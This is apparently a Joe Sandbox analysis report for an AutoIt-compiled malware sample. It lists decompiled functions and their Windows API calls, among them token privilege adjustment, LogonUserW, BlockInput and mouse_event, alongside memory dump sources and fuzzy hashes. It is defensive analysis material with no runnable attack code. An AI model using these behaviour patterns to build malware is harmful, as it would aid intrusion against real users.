                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0088977D,?,0089FB84,?), ref: 0087A314
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 3ebc6ff0967aa563f12673b2c4763c3dfc5d65abd7d12130d1590d0f7b06f5f0
                                                            • Instruction ID: 995a64d295b4d0de7d7ded03a5b12a085804b1b41696df08dd85faaf68409b4b
                                                            • Opcode Fuzzy Hash: 3ebc6ff0967aa563f12673b2c4763c3dfc5d65abd7d12130d1590d0f7b06f5f0
                                                            • Instruction Fuzzy Hash: 1FF0823554422DBBDB10AFA4CC48FEA776DFF08761F008266B919D6281DA309940CBA1
                                                            Function 00868713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00868851), ref: 00868728
                                                            • CloseHandle.KERNEL32(?,?,00868851), ref: 0086873A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: a1e8dc7d62366df803405663ee9b12115f42f8c1c947cf0db0e635760b3f7702
                                                            • Instruction ID: eb15686c076280bd6cbe50f58420d7b827b431d467b3a9f16306083c55fa3e58
                                                            • Opcode Fuzzy Hash: a1e8dc7d62366df803405663ee9b12115f42f8c1c947cf0db0e635760b3f7702
                                                            • Instruction Fuzzy Hash: ABE04632000A00EFEB292B24EC08D777BA9FB00750B24882AF59AC0431CB62AC90DB50
                                                            Function 0083A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00838F97,?,?,?,00000001), ref: 0083A39A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0083A3A3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: dbaa5e55d035e00146f09c7195bdee78b0d71eeaa6ec504593d86a619f18506b
                                                            • Instruction ID: 5c29342c6502a54dbcc9c71d05cc968f036e62f1603a69a84e19654194a45d08
                                                            • Opcode Fuzzy Hash: dbaa5e55d035e00146f09c7195bdee78b0d71eeaa6ec504593d86a619f18506b
                                                            • Instruction Fuzzy Hash: 00B09231054208EBCA043BA1EC09B883F68FB44BA2F444022F70DC4262CB6654A0AA91
                                                            Function 0083F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54daef090160042019a82a7d0e8b1e79f0246c47c2e6db47b7eb63b9f3bd730b
                                                            • Instruction ID: 0964d3843bfce21644a41635eb04150a6736a3f8422caa8f33cfff290a6dff3c
                                                            • Opcode Fuzzy Hash: 54daef090160042019a82a7d0e8b1e79f0246c47c2e6db47b7eb63b9f3bd730b
                                                            • Instruction Fuzzy Hash: 4F32F162D69F054DEB239634DC32326A248FFB73D4F15D737E819B5EA6EB2884835180
                                                            Function 0084267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6ac984c5f3c482c0a1740a469067a717351ab21ee61f3b327f76b037a058cd3
                                                            • Instruction ID: 748db22cd7557e1d497a44632c13cf5f3a2ff2dc1816d7ba91c95730a28597e8
                                                            • Opcode Fuzzy Hash: b6ac984c5f3c482c0a1740a469067a717351ab21ee61f3b327f76b037a058cd3
                                                            • Instruction Fuzzy Hash: 63B1F020D2AF514DE76396398831336BA4CBFBB2D5F91D71BFC2674E22EB2185838141
                                                            Function 00878B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __time64.LIBCMT ref: 00878B25
                                                              • Part of subcall function 0083543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008791F8,00000000,?,?,?,?,008793A9,00000000,?), ref: 00835443
                                                              • Part of subcall function 0083543A: __aulldiv.LIBCMT ref: 00835463
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID:
                                                            • API String ID: 2893107130-0
                                                            • Opcode ID: 8089f6542b5d9293fa63d2fcc1302c770fa32b23b713aa40be03446f8c1009ca
                                                            • Instruction ID: 6bc6b57a0c9540b56158c8c0c93b4d4fc09ca14b6588acb6202fb7d256dcb626
                                                            • Opcode Fuzzy Hash: 8089f6542b5d9293fa63d2fcc1302c770fa32b23b713aa40be03446f8c1009ca
                                                            • Instruction Fuzzy Hash: BF21E472635510CBC729CF29D441A52B3E1FBA4321B288F6DD0F9CB2D0DA34B905CB94
                                                            Function 008841FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00884218
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: 7afe93099ba1f4a5661a85f03f50e37cf1fd91f902e796dc8f666f525d2d40f1
                                                            • Instruction ID: d3755e880927d58e55ce0fda84100a23448dac12a4c52c402aea735d93615b34
                                                            • Opcode Fuzzy Hash: 7afe93099ba1f4a5661a85f03f50e37cf1fd91f902e796dc8f666f525d2d40f1
                                                            • Instruction Fuzzy Hash: 68E01A722442159FC710AF59D844A9AB7ECFFA4760F008026F98AC7252DA70A8408BA1
                                                            Function 00874EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00874EEC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: cced44a1b5e7a941ee5edfb4a6458af0510c239fa4eb7ae6e4dae988b2644775
                                                            • Instruction ID: 5d76b361b2e73d61b84d94e52cac04cb34e018323743f86ef5077cac68df6006
                                                            • Opcode Fuzzy Hash: cced44a1b5e7a941ee5edfb4a6458af0510c239fa4eb7ae6e4dae988b2644775
                                                            • Instruction Fuzzy Hash: 0AD05E9B1A461879FC5C4B249C5FF771108F3007B5FD4F14AB10AC90DADAD1EC505531
                                                            Function 00868C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008688D1), ref: 00868CB3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: d88c8d8fbb0329d9417be9425cd18d53da5051ed0b045abd674688db5f74217f
                                                            • Instruction ID: f6e53f74655515c541b91b2eeb4c88a7f41f04ea6fea8156b8905fb4551b049d
                                                            • Opcode Fuzzy Hash: d88c8d8fbb0329d9417be9425cd18d53da5051ed0b045abd674688db5f74217f
                                                            • Instruction Fuzzy Hash: 63D05E3226490EABEF019EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                            Function 00852230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00852242
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: 589f4e06d7dc61ae5c20b195d408bf46ad8772b38484e73e530ec2a9bad9374b
                                                            • Instruction ID: 88ce87e2ca13600f4c05d3a9918b418b18b503617ac1d806e0004e3ecb2a1832
                                                            • Opcode Fuzzy Hash: 589f4e06d7dc61ae5c20b195d408bf46ad8772b38484e73e530ec2a9bad9374b
                                                            • Instruction Fuzzy Hash: C0C04CF180010DDBDB05DB90D988DEE77BCBB04315F144056A501F2101D7749B448A71
                                                            Function 0083A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0083A36A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 6e51b903f6ba64dd6181eed89b4be1d880024e739e008822b28160b111716c69
                                                            • Instruction ID: c90244e478a75a5937df32483623e3830fa089dbd28f08b5484ba84c056a748f
                                                            • Opcode Fuzzy Hash: 6e51b903f6ba64dd6181eed89b4be1d880024e739e008822b28160b111716c69
                                                            • Instruction Fuzzy Hash: 6AA0123000010CE78A002B51EC044447F5CE600190B004021F50C80122873254505580
                                                            Function 00828A0E Relevance: .6, Instructions: 608COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4ded2cb3d1361fdc8a01d65b060dd1ecfbe8fa0e82f16e237e6ea035ed7fbfe
                                                            • Instruction ID: fd12144d4cdd426599cf99d50ccecd9e7fb66bc0cfe714d03d26754108da314a
                                                            • Opcode Fuzzy Hash: f4ded2cb3d1361fdc8a01d65b060dd1ecfbe8fa0e82f16e237e6ea035ed7fbfe
                                                            • Instruction Fuzzy Hash: 60221730A0662ACBDF288F28E4D467DB7B1FB41354F69846AD842CB691DB349DC1CB61
                                                            Function 00832405 Relevance: .3, Instructions: 345COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: f6e276aba9adbcc0683dcde6656fe52e591333234c3c964fd16918f8a613bf32
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 93C1803220519309DF6D8639D43403EBAE1BEE2BB1B1A076DE4B3CB5D4EF20D524D6A0
                                                            Function 0083283A Relevance: .3, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 404ef839436c748c05bc784a7a6e7835f1b9be02989f683f0b71558ced372d50
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: DFC194322051A30ADF2D463A943413EFBE1BBE27B171A176DE4B2DB5D4EF20D524D660
                                                            Function 00831BB8 Relevance: .3, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: a6e23bb998e7e433d1860a0f4dc4306f21eeeeb040ce56b65cf16d0f803484bb
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 10C1723220519309DF6D463A947803EBAE1FBE2BB171A1B6DE4B3CB5D4EF20D524D660
                                                            Function 024435D0 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: d56e0180c7c2aae2a3a3045c8d25dee7c9ce4bac5e762273b7cf1ab91e58c67d
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: A541D371D1051CEBDF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB40
                                                            Function 024434C0 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: 077b4dc2293ce71b444f297dcd4efbd28c5363fd2697b415d4b6972931dff54f
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 94019278A00109EFDB44DF98C5909AEFBB5FB48710F2085DAD809A7741DB31AE41DB80
                                                            Function 02443460 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: d944c4cb135d89b31ce0336b87287b55c9cdbf4fc5933ebd35bdb8cb574d6bca
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: 67018078A00109EFDB48DF99C5909AEFBB5FB88710B6085DAD809A7741DB30AE41DB80
                                                            Function 02441E70 Relevance: .0, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            Function 00887B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00887B70
                                                            • DeleteObject.GDI32(00000000), ref: 00887B82
                                                            • DestroyWindow.USER32 ref: 00887B90
                                                            • GetDesktopWindow.USER32 ref: 00887BAA
                                                            • GetWindowRect.USER32(00000000), ref: 00887BB1
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00887CF2
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00887D02
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887D4A
                                                            • GetClientRect.USER32(00000000,?), ref: 00887D56
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00887D90
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DB2
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DC5
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DD0
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DD9
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DE8
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DF1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887DF8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00887E03
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887E15
